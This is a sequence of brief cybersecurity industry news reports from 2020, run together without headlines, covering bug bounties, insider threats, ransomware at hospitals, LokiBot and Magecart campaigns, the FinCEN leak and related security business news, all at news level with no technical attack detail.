Bug bounty hunters have been given fresh digital grounds to prowl with the launch of a new vulnerability detection rewards program by ConnectWise.
The software provider announced today that it has launched a bug bounty program to supplement its own internal vulnerability management strategy. The crowdsourced program was created with the aim of boosting efforts to quickly identify and remediate bugs and security vulnerabilities in the company's software.
To host the program, ConnectWise is partnering with hacker-powered security platform HackerOne. The ConnectWise Bug Bounty program is private, meaning that it is only open to invited hackers via the HackerOne platform.
ConnectWise said that it is committed to addressing all confirmed vulnerabilities that are discovered through the bug bounty program and will remediate and disclose issues "commensurate with severity." Responsible disclosures will continue to be delivered through the ConnectWise Trust Site, which houses the company's security bulletins and alerts, critical patches, and updates, with the ability to subscribe to proactive notifications via an RSS feed.
“Cyber criminals move fast, so we have to move faster," said Tom Greco, director of information security at ConnectWise. "Employing a bug bounty program with the help of HackerOne, the industry leader in this space, will allow us to do just that by finding issues before bad actors get a chance to exploit them.”
Greco said that the world's bug bounty hunters provide an extra layer of protection by seeking out and reporting vulnerabilities.
“Crowdsourcing in this way represents a solid additional layer of security, and we clearly value the community’s expertise and participation in helping us keep our products secure," he commented.
"As we said earlier this year, the launch of this Bug Bounty program is yet another important addition to our security arsenal—and it’s the latest piece of our overall strategy to strengthen our own security standing so that we can better protect our partners and their SMB customers.”
ConnectWise is headquartered in Tampa, Florida, but has offices across the United States and abroad in Australia, India, and the United Kingdom. The company was founded in 1982 and became a Thoma Bravo Portfolio Company on March 1, 2019.
Four former eBay executives accused of cyber-stalking and intimidating a Massachusetts couple are to admit their guilt before a court next month.
The married couple, an editor and a publisher residing in Natick, were targeted with a series of terrifying deliveries after they criticized eBay in an online newsletter.
Horrific parcels sent to the couple included a bloody pig mask, live spiders and cockroaches, a book on surviving the death of a spouse, and a wreath of funeral flowers. In addition, pornographic magazines addressed to the husband were received by one of the couple's neighbors.
The four defendants due to plead guilty in October are among six former senior employees of the American multinational e-commerce corporation who were charged in June with carrying out the terrifying cyber-campaign.
Court documents alleged that one member of eBay's executive team directed the company's former senior director of safety and security, James Baugh, to "take her down," referring to the newsletter's editor.
Baugh, of San Jose, California, and eBay’s former director of global resiliency, David Harville, of New York City, are charged with conspiracy to tamper with witnesses and conspiracy to commit cyber-stalking.
Other former eBay employees charged in relation to the alleged cyber-stalking are Stephanie Popp, former senior manager of global intelligence; Stephanie Stockwell, former manager of eBay’s Global Intelligence Center; Brian Gilbert, former senior manager of special operations for eBay’s Global Security Team; and Veronica Zea, a former eBay contractor who worked as an intelligence analyst in the Global Intelligence Center.
It is further alleged that the executives created fake social media accounts from which they sent the couple threatening messages and which they used to post statements about fictitious events happening at the couple's home address.
News of the quartet's intention to admit culpability was shared earlier today on Twitter by the US Attorney's Office in the district of Massachusetts. Precisely which defendants are planning to admit their part in the affair was not specified.
The office's tweet read: "Four former employees of #eBay are scheduled to plead guilty on Oct. 8 at 2pm via zoom in federal court in #Boston. The defendants are charged w/ participating in a cyberstalking campaign that targeted a Massachusetts couple."
Defence Digital, a department of the UK’s Ministry of Defence (MOD), has added Oracle Cloud Infrastructure to its MODCLOUD Multi-Hybrid suite of secure services, it was announced today. The move is designed to help the department meet growing demand for real-time information advantage, as well as manage vast quantities of data in an efficient and compliant way.
The Defence Digital department is “responsible for making sure that effective digital and information technology (D&IT) is put into the hands of the military and business front line”, with its remit including defensive cyber strategy, capability development and policy.
To help facilitate this, Oracle’s range of technologies will be made available to the wider Defence community under a pan-defence Oracle enterprise agreement, and through Oracle’s integrated suite of services under a single sign-on. This will give the MOD access to emerging technologies such as digital assistants, data visualization, mobile hub and low-code development tools, substantially expanding its technological capabilities.
Sara Sharkey, MOD Defence Digital application services and devops head, commented: “The real opportunity of digital transformation—which includes artificial intelligence, machine learning, IoT, blockchain, and human interfaces—is to embrace data on a scale we’ve never seen before. Selecting Oracle Cloud Infrastructure within our MODCLOUD Multi-Hybrid suite of services offers new technologies that are reshaping how we approach IT and using this information, allowing us to focus on innovation and outcomes for both business and importantly, people.”
Richard Petley, senior vice president and country leader at Oracle UK said: “By adopting Oracle Cloud Infrastructure, the Ministry of Defence will be one step closer to realising its wider transformation strategy.
"The MOD will capitalize on the choice and economic benefits Oracle Cloud Infrastructure can provide, all of which will help meet challenges that lie ahead. It joins a whole host of public sector organisations, such as the Home Office, Western Sussex Family Assist, Lambeth Borough Council, Croydon County Council, The Office for National Statistics and Scottish Water, which are already using Oracle Cloud.”
Canadian e-commerce platform Shopify has reported that it detected an ongoing insider threat case.
In a statement, Shopify said it had become aware of an incident involving the data of fewer than 200 merchants, and its investigation “determined that two rogue members of our support team were engaged in a scheme to obtain customer transactional records of certain merchants.”
Upon discovery, Shopify immediately terminated the individuals’ access to the Shopify network and referred the incident to law enforcement. “We are currently working with the FBI and other international agencies in their investigation of these criminal acts,” it said. “While we do not have evidence of the data being utilized, we are in the early stages of the investigation and will be updating affected merchants as relevant.”
Shopify said the incident was not caused by a technical vulnerability in the platform, and some stores may have had customer data exposed. “This data includes basic contact information, such as email, name, and address, as well as order details, like products and services purchased. Complete payment card numbers or other sensitive personal or financial information were not part of this incident.”
Shopify said it does not take these events lightly, and “we have zero tolerance for platform abuse and will take action to preserve the confidence of our community and the integrity of our product.”
Speaking to Infosecurity, Lisa Forte, partner at Red Goat Cyber Security LLP, said insiders are notoriously dangerous, and although they are rare, they wield legitimately granted access that external attackers could only dream of.
"Incidents involving insiders are also hugely damaging from a reputational standpoint," Forte said. "Perhaps more so than other attacks. Shopify have acted quickly and apparently transparently so far. It is unclear at this point what the precise motive of these insiders was, but all insider threats fall into one of three categories: fraud, sabotage or theft. Often insiders are not working totally alone, with research evidencing the tendency of colleagues to notice but ignore suspicious behavior."
In August, it was reported that a Tesla employee was apparently approached by an attacker, and offered $1 million to place ransomware internally.
Warren Poschman, senior solutions architect at Comforte AG, called the incident “the perfect example of the risks many organizations face,” as while it can be difficult to immediately identify a rogue employee or malicious insider, the damage they can do can be irreversible. “This can create a lot of distress on both the business side and on consumers, as fraud is easy to commit with stolen or accessed account information,” he said.
Jake Moore, cybersecurity specialist at ESET said: “Insider threats are a constant risk that businesses have always had to take a chance with. However, an increase in remote working – alongside the consequent factor of new employees never physically meeting their employers – accelerates the risks, meaning that insider attacks may become more prevalent than ever.”
The evolution towards being able to operate without passwords is being driven by two factors: BYOD and standards.
Speaking on a Cisco webinar, advisory CISO J. Wolfgang Goerlich said while we have to wait for “robots and flying cars,” he could see a world with reduced reliance on passwords. He said the consumer typically drives the experience that they expect in the workplace, and consumerization has enabled users to become more familiar with the technology they use.
Goerlich also praised standards, in particular from the FIDO Alliance, on “what a good passwordless token looks like.” He said there is a lot of confidence in the standards, and that while strong factors have matured, a strong factor is still typically paired with a password to make it easy for people to get in. “So in a passwordless world, they throw in a username and complete a secondary factor of authentication without having to enter a password, and then they don’t have to remember things or rotate things,” he said.
Citing Cisco statistics, Goerlich said the average user has 191 passwords, “so the ability to move off of those is something we’re very excited about.” He said the “pieces have come together” and CISOs are integrating a passwordless concept with their roadmaps.
Fellow advisory CISO for Cisco EMEA, Richard Archdeacon, agreed CISOs are beginning to look at passwordless as an option, and are looking to see if this can work at an enterprise level. “It achieves two ends: it improves your security; and it makes life easier for people, and if you can make life easier when you’re in a security team, that is a real plus,” he said.
Goerlich also made the point that CISOs often think about how to increase trust in passwordless authentication, and how fraud can be combated once passwords are abandoned. He recommended using targeted machine learning to enable logins, as well as zero trust strategies. He said: “I think there is a lot that has to be considered when we talk about the next step, making it scale to the enterprise and really how we secure that passwordless future.”
Wendy Nather, head of advisory CISOs, said what is making this possible is that we have more secure enclaves on phones than before, and more trusted processing modules on laptops, “where cryptographic functions can be manipulated securely without any interference from the user or any attacker who might be on the laptop or the device.”
Nather said that using the FIDO standard, a “shared secret” can be created, which is a parent key, and used to authenticate to the phone using TouchID or FaceID, and the secure enclave would log you in, without the user having to do anything. “From my perspective I wouldn’t have to put in a password, I would just log into my phone with my fingerprint, and then the phone would do the rest. This is one way we are making passwordless a reality.”
Most UK and US workers now view cybersecurity professionals in a positive light, although worryingly few are considering a career in the industry, according to a new study from (ISC)2.
The certifications body polled 2,500 workers in the US and UK to compile its 2020 Cybersecurity Perception Study.
It revealed that perceptions of those working in cybersecurity are now generally positive: 71% claimed they view security pros as “smart, technically skilled individuals,” while 51% described them as “good guys fighting cybercrime.”
However, more concerning is the lack of interest in pursuing a career in the industry: 69% of respondents said it’s not the right fit for them, despite admitting that objectively it seems like a good option.
Part of the reasoning behind this is that individuals believe cybersecurity roles require a significant investment of time and money in training and the accrual of technical knowledge.
Some 61% said they thought they’d need more education or a certification before getting a job in the sector, 32% believe it requires too much tech know-how or training, 27% said they don’t know how to code and 26% claimed it is “too intimidating.”
Women were more likely than men to perceive the industry as intimidating and to be put off by the lack of diversity.
These perceptions may have been formed in part because most (77%) respondents were never offered cybersecurity as part of their school or college curriculum. Partly as a result, the majority (68%) said their view of the industry is shaped by portrayals in TV shows and movies (37%) or by news coverage of security incidents (31%).
Frustratingly for those hoping to encourage more people into the industry, the report comes at a time when many are considering a career change. Further, attributes such as job stability (61%), flexible working (57%) and earning potential (56%), all of which are available in security roles, are now priorities for respondents.
Perceptions of cybersecurity matter because, with an estimated global shortfall of over four million professionals, a major recruitment drive is needed to encourage workers to switch career paths.
However, the unpalatable truth is that many of the respondents’ negative perceptions are accurate: employers still often rely too much on certifications and previous experience when selecting candidates, and diversity is a persistent problem.
A particularly acute challenge will be changing perceptions among younger professionals: Generation Z respondents were least likely to view cybersecurity professionals in a positive light.
“The reality of the situation, and what we need to do a better job of publicizing, is that a truly effective cybersecurity workforce requires a broad range of professionals who bring different skillsets to their teams,” argued (ISC)2 COO, Wesley Simpson.
“While technical skills are vital for many roles, we also need individuals with varied backgrounds in areas including communications, risk management, legal, regulatory compliance, process development and more, to bring a well-rounded perspective to cyber-defense.”
The US government has been forced to sound the alarm over anticipated attempts by hostile nations and cyber-criminals to spread disinformation around the results of the 2020 elections.
In a new Public Service Announcement on Tuesday, the FBI and Cybersecurity and Infrastructure Security Agency (CISA) warned that “foreign actors and cyber-criminals” could use several channels to undermine confidence in the democratic process, including new and defaced websites and social media posts.
“State and local officials typically require several days to weeks to certify elections’ final results in order to ensure every legally cast vote is accurately counted. The increased use of mail-in ballots due to COVID-19 protocols could leave officials with incomplete results on election night,” it explained.
“Foreign actors and cyber-criminals could exploit the time required to certify and announce elections’ results by disseminating disinformation that includes reports of voter suppression, cyber-attacks targeting election infrastructure, voter or ballot fraud, and other problems intended to convince the public of the elections’ illegitimacy.”
The alert urged the US public to get their news only from trusted sources of verified information, such as state and local election officials.
The process of counting votes could be dragged out even longer thanks to new policies rolled out by Trump appointee and new head of the Postal Service (USPS) Louis DeJoy, which some reports have claimed are already causing major delivery delays.
Any misinformation campaigns would only have to echo the sentiments of the President himself to undermine faith in the democratic process: Trump has claimed repeatedly without evidence that mail-in voting could lead to widespread voter fraud.
The FBI/CISA urged US voters to: be more critical when reading news about the election results, verify with multiple reliable sources, including state and local government election officials and make use of social media tools designed to flag fake news if they spot anything suspicious.
The US government has warned of a major increase in detections of info-stealing malware LokiBot over the past couple of months.
The Cybersecurity and Infrastructure Security Agency (CISA) sounded the alarm on Tuesday, revealing that its Einstein intrusion detection system had spotted a “notable increase” in the use of the malware since July.
“LokiBot uses a credential- and information-stealing malware, often sent as a malicious attachment and known for being simple, yet effective, making it an attractive tool for a broad range of cyber-actors across a wide variety of data compromise use cases,” it added.
Also known as Loki PWS, the Trojan malware is designed to steal usernames, passwords, cryptocurrency wallets and other credentials through the use of a keylogger. It can also deploy a backdoor, enabling the installation of additional payloads.
Although it is spread most often by malicious email attachment, users could also be targeted via phishing texts and private messages, or by infected websites.
First discovered in 2016, LokiBot has mainly been used to target Windows and Android users, and in the past has even been used as a banking Trojan and mobile ransomware. Most recently, Trend Micro researchers discovered a version disguised as a launcher for popular gaming title Fortnite.
Gurucul CEO, Saryu Nayyar, argued that the CISA warning shows how cyber-criminals are successfully scaling their business model.
“The fact that LokiBot has been around for over four years and has gained in capability over time is a reflection of how much malicious actors have advanced the state of their art, leveraging the same development models we use in the commercial space,” she added.
“Fortunately, our security tools have also improved over time. Using a combination of data sources for telemetry, it's possible to analyze events as they happen and identify malicious user or system behaviors. This lets an organization mitigate these attacks before they can cause serious damage.”
CISA recommended a range of best practice steps to mitigate the threat including: prompt patching; use of up-to-date AV; multi-factor authentication; scanning for malicious email attachments; user monitoring; and employee awareness training.
A global sting operation targeting drug trafficking on the darknet has led to 179 arrests and the seizure of weapons, drugs, and millions of dollars in cash and virtual currencies.
Operation DisrupTor was conducted across the United States and Europe and was a collaborative effort between the law enforcement and judicial authorities of Austria, Cyprus, Germany, the Netherlands, Sweden, Australia, Canada, the United Kingdom, and the United States.
According to a statement released today by Europol, the 179 individuals arrested as part of the operation were vendors who had allegedly engaged in tens of thousands of sales of illicit goods.
The arrests were carried out in the United States (121), Germany (42), the Netherlands (8), United Kingdom (4), Austria (3), and Sweden (1).
Hinting at more arrests to come, Europol said: "A number of investigations are still ongoing to identify the individuals behind dark web accounts."
Law enforcement seized $6.5m, 64 firearms, and 500 kilograms of drugs, including fentanyl, oxycodone, hydrocodone, methamphetamine, heroin, cocaine, ecstasy, MDMA, and medicine containing addictive substances.
"The golden age of [the] dark web marketplace is over," said Europol. "Operations such as these highlight the capability of law enforcement to counter encryption and the anonymity of dark web marketplaces."
The head of Europol’s European Cybercrime Centre (EC3), Edvardas Šileris, said: "Today’s announcement sends a strong message to criminals selling or buying illicit goods on the dark web: the hidden internet is no longer hidden, and your anonymous activity is not anonymous."
Operation DisrupTor builds on the success of last year’s Operation SaboTor and the coordinated law enforcement takedown of the Wall Street Market, one of the largest illegal online markets on the dark web.
"Following the Wall Street Market takedown in May 2019, US and international law enforcement agencies obtained intelligence to identify Darknet drug traffickers," stated the United States Department of Justice. "Darknet vendor accounts were identified and attributed to real individuals selling illicit goods on Darknet market sites such as AlphaBay, Dream, WallStreet, Nightmare, Empire, White House, DeepSea, Dark Market and others."
As a result of operation DisrupTor, federal prosecutions are being conducted in more than 20 federal districts.
Long Island's only tertiary care center and Regional Trauma Center has issued a warning to patients that their personal data may have been exposed as a result of a ransomware attack.
Stony Brook University Hospital has contacted patients by letter to notify them of a possible data breach following an attack on the hospital's third-party vendor Blackbaud in May 2020.
Blackbaud is a communications and fundraising software provider for nonprofits, universities, healthcare organizations, foundations, and other entities worldwide.
Stony Brook was notified by Blackbaud on July 17 that "patient information may have been involved in a security incident on Blackbaud’s systems."
Hospital patients have been warned that data that was on the Blackbaud systems affected by the cyber-attack may have included their name, date of birth, address, contact information, attending doctor, insurance provider, and medical service department.
"Stony Brook did not provide your Social Security number, bank account information or credit card number to Blackbaud, and so these types of information were not in Stony Brook’s files on the potentially affected systems," the hospital told patients in a notification uploaded to its website.
Blackbaud assured the hospital that data stolen in the attack was destroyed and not used, sold, or distributed.
The healthcare provider said: "Based on statements from Blackbaud, we have no reason to believe that the information involved in this incident has been misused."
The 624-bed hospital emphasized that the attack on Blackbaud did not involve access to any Stony Brook systems, including medical systems or electronic health records.
Stony Brook said that it will individually notify "potentially impacted patients for whom it has a valid mailing address." It did not say how it intended to contact patients who did not have a valid mailing address.
Patients have been advised to regularly monitor any statements that they receive from their health plans or healthcare providers and check for any unfamiliar healthcare services.
Stony Brook said: "We are evaluating additional security measures and continue to conduct appropriate oversight of our vendors to help ensure this does not happen in the future."
A cyber-attack that caused a German hospital to refuse treatment to a woman who subsequently died has been linked to a Russian ransomware gang.
Attackers struck Düsseldorf University Clinic (DUC) on the night of Thursday, September 10, gaining access by exploiting a vulnerability in some commercially available Citrix software.
The hospital's IT systems crashed as a result, and patients seeking urgent care were diverted to another hospital 20 miles away in Wuppertal. A woman who had to seek urgent care elsewhere because the digitally besieged DUC was unable to treat her later died.
A spokesman for the responsible public prosecutor's office at the Cybercrime Central and Contact Point (ZAC) said the investigation into the suspected negligent homicide of a patient is ongoing.
First observed in April 2019, DoppelPaymer is a form of ransomware that is believed to have originated from Russia.
"DoppelPaymer is a fork of BitPaymer, and BitPaymer was attributed to Evil Corp, which has been sanctioned by the US and has ties to the Russian Government," said Emsisoft's Brett Callow. "The nature of the relationship between DoppelPaymer and Evil Corp is not clear, but some cooperation has been observed."
DoppelPaymer uses virus-themed email subject lines to attract victims. Like ransomware thugs MAZE, its operators extort money from victims by encrypting and exfiltrating their data and threatening to sell and/or publish sensitive information on the darknet.
News that DoppelPaymer was deployed in this tragic attack was included in a report to the German state parliament's legal committee and announced earlier today by the Ministry of North Rhine-Westphalia.
An investigation into the cyber-incident by German authorities found that hackers smuggled a "loader" into the server at the DUC, possibly months before the next phase of the attack was carried out.
On the night of September 10, the criminals caused encryption software to be downloaded, infecting 30 servers at the DUC.
The hospital's IT systems remain disrupted in the wake of the attack, threatening the safety of other people seeking urgent treatment. Emergency room services are expected to be restored this week.
Collaboration in an enterprise can better enable security going forward, after a challenging six months.
Speaking on a Cisco webinar, Wendy Nather, head of advisory CISOs, said there is a need for collaboration over control, as “control presents greater cost for the enterprise.” Asking what security tasks users can be asked to take care of, and what can no longer be enforced, Richard Archdeacon, advisory CISO for Cisco EMEA, said there is a chance CISOs are “losing control anyway and will need to become collaborative in order to secure their organizations.”
Fellow advisory CISO J. Wolfgang Goerlich said we have seen the workforce has become more savvy, and this has led to “creative things” in terms of the way the business works with the employees.
Goerlich said the idea of collaboration is sound, and asked how can we introduce constraints, yet still have good relations with the workforce? “Also, how can we leverage this savviness of the workforce that it is developing, and how can we embrace our shadow so to speak?”
Nather said the difference between collaboration and control could have a significant effect on how we build our security products, “not with the assumption that there is a centralized control point that is setting all of the policies and doing all the monitoring and the enforcement, but rather that there are multiple controls, some within the enterprise and some without.”
This has led to the concept of secure remote work. Nather said that when everyone needed to work from home, there were big problems in the supply chain: enterprises could not get the laptops they needed, so employees had to use what they had at home.
“That forced enterprises into BYOD, where they may not have necessarily embraced it before, but now they have no choice,” she said. “As a result of that, the users - especially in Europe - pushed back and are saying ‘this is not a corporate device and I do not want you monitoring it, I do not want any possibility you will erase my data’ and especially when users are at home. Those enterprises that are used to scanning endpoints for vulnerabilities cannot do it any more as the ISPs sitting between user at home and enterprise may see this as an attack.”
Nather said this has resulted in businesses telling users that they can do what they wish on their own devices, but that they need to meet security requirements to access corporate applications. “That is the balance, the collaboration that we are starting to see pushed more and more with remote work,” she said.
Goerlich said that in times of stress, when everyone is trying to work remotely, organizations go back to “tried and true security” like good MFA, DNS security and a good VPN connection. “One of the trends we’re seeing, in response to the stress, is a doubling down on bread and butter fundamental security controls,” he said.
Archdeacon said there is a trend to get the core fundamentals and controls correct, and organizations are now looking ahead to ask how this will affect the business in the future. “This comes back to the point of collaboration and control, where we are going to shift the security control to endpoint and user and we’ve got to collaborate with them to be part of our frontline security team when they start to access our resources,” he said.
Nather concluded by saying that the remote work model had to be re-thought quickly, so many organizations had to put in whatever they could at the last minute, and this will impact on users, and ultimately CISOs too. “If they didn’t put in something sustainable at the beginning, they are going to have to now.”
It was also revealed that Duo's user authentications jumped from 600 million to 800 million per month due to the rush to enable remote work, while over 500 million meeting participants generated 25 billion meeting minutes in April, more than triple the volume in February.
In addition, the report found that 50% of infosecurity professionals believe cyber-warfare will be detrimental to the overall economy during the next 12 months.
Despite this, over a fifth (22%) of CISOs admitted that they do not currently have a strategy in place to defend against this threat. More encouragingly, 51% of CISOs and 48% of infosec professionals acknowledged that they need a strategy to protect against cyber-warfare during the next 12-18 months.
The survey of 6,724 infosecurity professionals also showed that ransomware has risen substantially amid the COVID-19 pandemic in 2020, with 43% reporting seeing an increase in this type of attack. Close to three-quarters (70%) of CISOs/CIOs and 63% of infosec professionals said they expect to see ransomware attacks grow further in the next 12-18 months, while 59% of CISOs/CIOs and 50% of infosec professionals expressed fears that a ransomware attack could potentially wipe out their business in the next 12-18 months if there is no increased investment in security.
In order to gain internal investment to improve defences against these cyber-warfare and ransomware threats, 51% of infosec professionals agreed that the way they communicate about security has to change dramatically. In regard to the type of changes needed, 41% of infosec professionals believe more communication with the wider public is required, both within the organization and outside it. Additionally, 38% feel there should be better communication with C-suite executives, particularly in helping them appreciate the wider business risks posed by these cyber-attacks.
Liviu Arsene, global cybersecurity researcher at Bitdefender commented: “2020 has been a year of change — not only for the world at large — but for the security industry. The security landscape is rapidly evolving as it tries to adapt to the new normal, from distributed workforces to new threats. Amongst the new threats is cyberwarfare. It’s of great concern to businesses and the economy — and yet not everyone is prepared for it. At the same time, infosec professionals have had to keep up with new threats from an old source, ransomware, that can affect companies' bottom lines if not handled carefully.
“The one thing we know is that the security landscape will continue to evolve. Changes will happen, but we can now make sure they happen for better and not for worse. To succeed in the new security landscape the way we as an industry talk about security has to become more accessible to a wider audience to gain support and investment from within the business. In addition, we have to start thinking about plugging the skills gap in a different way — we have to focus on diversity, and specifically neurodiversity, if we are to stand our ground and ultimately defeat bad actors.”
Cowbell Cyber has announced the launch of a cyber insurance program designed to deliver coverage to address the diversity of incidents under the ‘cyber’ category.
Named Prime 250, Cowbell Cyber said this is intended to deliver “on the need for clarity, simplicity, speed and flexibility” in the space, especially as research has shown that “not understanding coverage” (63%) and “cost” (46%) remain obstacles to the adoption of cyber insurance.
“For years, policyholders have raised concerns about the complexity and opacity of cyber insurance. Meanwhile, cyber-incidents are becoming more frequent and diverse,” said Trent Cooksley, co-founder and COO at Cowbell Cyber. “We have created Prime 250 with the explicit intent to make cyber insurance easy and bring clarity to coverages and policy terms so that every business can benefit from the financial protection delivered by cyber insurance.”
In an email to Infosecurity, Caroline Thompson, head of underwriting at Cowbell Cyber, said the intention was to simplify the application process, so it is now 100% online and only requires the company name and its domain name. She said: “All quotes issued by Cowbell are bindable; this eliminates any delay. We see businesses in need of a Certificate of Insurance (COI) for contractual reasons. We can deliver policy and COI in minutes. Nobody else can do this in the market.
“There are side cases that might be automatically referred to our underwriting team, this is all online, triggered automatically with all information required to make a timely decision. This is what we call Prime 250, a Cyber Insurance 2.0 solution.”
In particular, Prime 250’s 25 cyber-specific coverages are organized to mirror the way businesses experience cyber-incidents: first party loss, first party expense and liability. Policyholders receive value from day one of their policy, with access to Cowbell Factors for risk rating and industry peer benchmarking, while Cowbell offers recommendations to remediate identified risk exposures.
Thompson said the intention was to close the gap “on immediate issues related to cyber being bundled with other commercial insurance policies such as a Property & Casualty policy or Business Owner Policy as an add-on (endorsement).”
“Most importantly, we are proud to bring transparency to policyholders,” she added. “With Cowbell Factors and Cowbell Insights, users get a view into their cyber-risk exposure and how to improve their security posture as they get a cyber insurance quote so they can understand how the quote and the policy are built. This provides value on day one and every day after.”
Six individuals have been indicted on conspiracy charges after they allegedly bribed Amazon workers to gain an unfair competitive advantage on Amazon Marketplace estimated to be worth $100m.
The alleged co-conspirators are Ephraim Rosenberg, 45, of Brooklyn, New York; Joseph Nilson, 31, and Kristen Leccese, 32, of New York; Hadis Nuhanovic, 30, of Acworth, Georgia; Rohit Kadimisetty, 27, of Northridge, California; and Nishad Kunju, 31, of Hyderabad, India.
They’ve been charged with conspiracy to use a communication facility to commit commercial bribery, conspiracy to access a protected computer without authorization, conspiracy to commit wire fraud and wire fraud.
Acting as consultants to third-party sellers on the marketplace, they are accused of bribing Amazon staff and contractors to the tune of over $100,000.
In return, the employees reinstated products and merchant accounts blocked by Amazon — including items flagged for violating IP laws, products removed after customer complaints and accounts suspended after manipulating product reviews.
The insiders are also alleged to have suspended competitor accounts, shared intelligence on these businesses and provided info on Amazon algorithms which allowed the six to flood competitor items with negative reviews.
The bribed employees are also said to have provided access to “Amazon’s highly confidential standard operating procedures and algorithms,” and circumvented internal controls to increase storage limits in warehouses, allow sales of restricted products and provide inside info on the most successful ad campaigns and profitable product listings.
As well as providing consultancy services to third-party sellers, Nilson, Leccese and Nuhanovic are also said to have operated and sold through their own accounts on Amazon Marketplace. Kunju was initially bribed as a seller-support worker before becoming an external consultant who recruited and bribed former colleagues, it is alleged.
“As the world moves increasingly to online commerce, we must ensure that the marketplace is not corrupted with unfair advantages obtained by bribes and kick‑backs,” said US attorney Brian Moran. “The ultimate victim from this criminal conduct is the buying public who get inferior or even dangerous goods that should have been removed from the marketplace. I commend the investigators and cybersecurity experts who have worked to identify and indict those engaged in this illegal scheme.”
Around half a million Activision account details have been breached, after an apparent credential stuffing attack.
According to a series of user reports on social media, detailed by Dexerto, attackers leaked the user credentials and locked users out of their accounts too.
Activision, whose games include Call of Duty, the Tony Hawk skateboarding series and Crash Bandicoot, does not offer two-factor authentication on accounts, and users encouraged each other to change passwords. In a statement, Activision said “reports suggesting Activision Call of Duty accounts have been compromised are not accurate.” It recommended players “take precaution to protect their Activision accounts, as well as any online accounts, at all times.”
A support blog featured advice on basic cybersecurity steps, such as using strong passwords and avoiding password re-use.
Martin Jartelius, chief security officer at Outpost24 said while this is much lower than the 77 million accounts exposed in the Playstation Network breach of 2011, this is still a substantial breach. “In parts the cleanup will be a large undertaking for Activision, we can only hope backups allow restoring original contact data, resetting access and managing the users who still cannot regain access which should be a smaller group,” he said.
Boris Cipot, senior security engineer at Synopsys, said: “Gaming is not simply entertainment for children, it is a thriving industry with highly sophisticated technology. For example, games now offer highly advanced simulators whereby individuals can embody a soldier, fighter pilot or even a football player. With the support of Virtual Reality technology, these games can become even more realistic.
“Moreover, we are witnessing a rise in E-sports, where tournaments and winners amass large pots of money. As there is a lot of money involved, it is normal for cyber-criminals to target known game brands to access user accounts.”
He suspected that the access is used for financial gain, rather than for account access, as “many accounts have a collection of virtual goods which can be acquired by gamers for real money.” Cipot said cyber-criminals could gain profits just by selling one or many accounts which hold valuable virtual goods. “In gaming, the real money lies in selling virtual goods,” he said.
Dean Ferrando, lead systems engineer (EMEA) at Tripwire, recommended those within the gaming industry to take this opportunity to review their own security controls to ensure they are adequately deployed. “A security team should be able to easily assess how many of what kind of assets are on the network, how securely they are configured, and what the vulnerability posture of those assets are,” he said. “All organizations should use this as a wakeup call to ensure that security is not just a check box for compliance. Organizations like Activision want to provide a safe and secure space for gamers and not a game over experience.”
Less than 13% of small and medium-sized businesses (SMBs) have cyber-insurance, potentially leaving large numbers exposed to the serious financial impact of online attacks, according to GlobalData.
The data analytics and consulting firm claimed in its 2020 UK SME Insurance Survey that the mid-market represents a potentially lucrative segment for insurers, given the relatively small number of firms currently covered for cyber-related losses.
GlobalData senior analyst, Daniel Pearce, argued that the need for specialized insurance coverage was even greater as distributed working has expanded the corporate attack surface and created security gaps which attackers are keen to exploit.
“The pandemic has increased businesses’ reliance on technology in order to operate during lockdowns, while social distancing guidelines continue to promote home working. With this growing dependence on technology comes an increase in cyber-risk,” he added.
“Given this, the need for cyber-insurance has arguably never been higher. Traditionally, cyber-insurance has seen greater levels of uptake and interest among mid-market and larger corporations, but the pandemic has accelerated the need for smaller business to purchase cover as well.”
Healthcare has been one of the sectors hardest hit by cyber-attacks, especially ransomware, over recent months. In fact, a German patient died recently after an attack forced her to be transferred to a different hospital, delaying treatment by an hour.
Accordingly, in the health and social work sector, cyber-insurance coverage is almost double the average, at 26%.
The findings chime with a poll of UK businesses by insurer Gallagher earlier this year which found that 82% did not have any specialized coverage for cyber-related incidents. Crucially, nearly half (46%) of respondents from mid-sized firms said they thought that cyber-attacks are “mainly an issue for bigger organizations.”
Yet despite the eye-catching headlines of major security incidents at large multi-nationals that cost millions of dollars to fix, a large number of attacks seek out the lower-hanging fruit of smaller businesses.
Ransomware was the number one cause of insurance claims in North America in the first half of 2020, according to Coalition.
Global financial institutions have largely failed over recent years to prevent mass money laundering linked to Russian oligarchs, mobsters and Conservative Party donors, according to a new trove of leaked documents.
Over 2000 suspicious activity reports (SARs) filed with the US government’s Financial Crimes Enforcement Network (FinCEN) between 2000 and 2017 were leaked to various publications, in an apparent whistleblowing effort designed to highlight the scale of criminal activity in this area.
SARs are filed by banks and others when illegal activity such as money laundering is suspected. Although this doesn’t require the lender to stop doing business with their clients, banks need to know who their account holders are and to stop any activity that may break international money laundering laws.
However, the sheer scale of the sums involved seems to highlight a major problem area for global financial institutions: the SARs from this leak relate to around $2 trillion in transactions, yet are just a small portion of the total reports filed during the 17-year period.
In fact, part of the challenge for the industry is that the scale of the money laundering challenge is still little understood. Accurate statistics are hard to come by, although the UN estimates it could be worth as much as 5% of global GDP ($7 trillion). In the EU, only an estimated 1% of illegal proceeds are seized by authorities.
Among the shady dealings uncovered in the FinCEN leak are evidence that an ally of Russian President Vladimir Putin had ties to a major Conservative Party donor, while other oligarchs avoided Western sanctions by buying art works in London, according to the BBC. Former Trump campaign manager, Paul Manafort, is also named in a SAR.
HSBC, Barclays Bank, JP Morgan, Standard Chartered and Deutsche Bank were all named as helping to move dirty money around the world.
The UK has been named a “higher risk jurisdiction” by FinCEN because of the large number of firms based in the country (3000+) that are named in the leaks.
The leak itself appears to have come from FinCEN given the SARs were originally issued by multiple different lenders. As such, the incident can be filed along with other major whistleblowing discoveries such as the Panama Papers and the Paradise Papers.
FinCEN reacted angrily to the incident, claiming to have referred it to the Department of Justice and the Treasury’s Office of Inspector General.
“As FinCEN has stated previously, the unauthorized disclosure of SARs is a crime that can impact the national security of the United States, compromise law enforcement investigations, and threaten the safety and security of the institutions and individuals who file such reports,” it said in a brief statement.
Online retailers, particularly those still using the Magento 1 e-commerce platform, need to take action fast to update their security posture, according to Sonassi, a Magento hosting provider.
Magento 1 officially reached its end-of-life at the end of June and is therefore no longer supported by security patches.
Last week it was revealed that around 2000 e-commerce stores running the Magento 1 software were targeted by Magecart attacks over the previous weekend in the largest recorded campaign of its kind. It is estimated that tens of thousands of customers unwittingly had their payment details stolen as a result of the attacks.
